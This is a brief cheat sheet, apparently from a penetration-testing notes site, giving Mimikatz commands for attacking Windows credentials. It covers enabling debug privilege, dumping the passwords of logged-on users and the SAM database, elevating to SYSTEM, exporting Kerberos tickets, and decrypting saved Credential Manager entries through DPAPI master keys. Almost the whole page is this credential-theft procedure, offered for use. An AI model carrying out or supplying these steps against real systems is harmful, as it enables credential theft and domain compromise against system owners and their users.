Mimikatz

A little tool to play with Windows security

Passwords & SAM

Launch mimikatz (as Administrator!)

mimikatz.exe

Engage SeDebugPrivilege

privilege::debug

-> OK

Whoami

token::whoami

Dump creds of all logged-on users

sekurlsa::logonpasswords

(Optional) Impersonate to nt authority\system

token::elevate

Dump sam database

lsadump::sam

Tickets

Show tickets

sekurlsa::tickets

Export tickets

kerberos::list /export

Credential manager saved credentials

Locally?

vault::cred

From DC?

dpapi::cred /in:"C:\Users\Bethany\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D"

[...]
  guidMasterKey      : {fbd1319f-d18d-448f-92e2-287944ecf24c}
[...]

dpapi::masterkey /in:"C:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\fbd1319f-d18d-448f-92e2-287944ecf24c"

-> Look for "[domainkey]", decrypt using same command with /rpc

PreviousOverview NextPowerSploit

Last updated 3 years ago